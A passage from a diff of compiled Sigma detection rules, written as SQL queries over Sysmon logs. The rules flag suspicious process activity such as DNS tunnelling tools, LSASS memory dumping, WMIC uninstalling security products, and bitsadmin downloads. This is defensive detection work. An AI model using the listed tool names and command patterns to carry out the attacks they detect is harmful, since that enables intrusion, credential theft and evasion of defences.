AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE 